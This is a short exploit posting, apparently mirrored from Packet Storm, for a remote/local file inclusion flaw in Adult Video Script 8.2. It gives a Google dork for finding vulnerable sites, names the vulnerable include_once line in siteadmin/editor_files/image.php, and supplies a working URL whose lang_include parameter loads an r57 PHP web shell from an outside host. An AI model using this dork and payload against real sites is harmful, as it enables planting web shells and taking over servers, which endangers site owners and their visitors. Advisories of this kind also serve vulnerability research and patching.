Share
## https://sploitus.com/exploit?id=PACKETSTORM:173122
====================================================================================================================================  
| # Title : Adult Video Script 8.2 RFI /LFI Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Download : https://update.avscms.com/files/avscms-8.2-full.zip |  
| # Dork : Powered by AVSCMS |  
====================================================================================================================================  
  
P0C :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] R/L File Inclusion :  
  
Line : 20 = include_once ('./lang/'.$lang_include);  
Function : include_once  
Variables :$lang_include  
C:\web\www\upload\siteadmin\editor_files\image.php  
  
[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |   
=======================================================================================================================================